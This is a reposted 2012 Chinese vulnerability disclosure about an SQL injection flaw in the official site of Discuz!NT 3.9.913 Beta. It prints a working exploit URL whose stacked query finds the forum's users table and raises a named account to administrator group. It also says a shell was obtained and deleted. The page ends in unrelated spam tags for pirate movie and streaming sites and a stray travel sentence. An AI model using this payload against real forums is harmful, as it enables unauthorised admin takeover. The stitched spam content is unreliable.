Discuz!NT 3.9.913 Beta 官网存在SQL注入漏洞

Home » 技术教程 » Discuz!NT 3.9.913 Beta 官网存在SQL注入漏洞

漏洞作者: Jannock

提交时间: 2012-02-13公开时间: 2012-02-18

漏洞类型: SQL注射漏洞简要描述:

DNT官网存在SQL注入漏洞,Powered by Discuz!NT 3.9.913 Beta

详细说明:

本来是测试凡客(),但发现官方也存在。注入地址:http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1利用:http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29–

Shell 已经删除

漏洞证明:

标签分类: SQL注入 漏洞 Discuz

大理的洱海形如人耳,风平浪静时,

Discuz!NT 3.9.913 Beta 官网存在SQL注入漏洞

相关文章:

你感兴趣的文章:

标签云:

亚洲高清电影在线, 免费高清电影, 八戒影院夜间, 八戒电影最新大片, 出轨在线电影, 午夜电影院, 在线影院a1166, 在线电影院, 在线观看美剧下载, 日本爱情电影, 日韩高清电影在线, 电影天堂网, 直播盒子app, 聚合直播, 高清美剧, 高清美剧在线观看 EhViewer-E站, E站, E站绿色版, qqmulu.com, qq目录网, qq网站目录,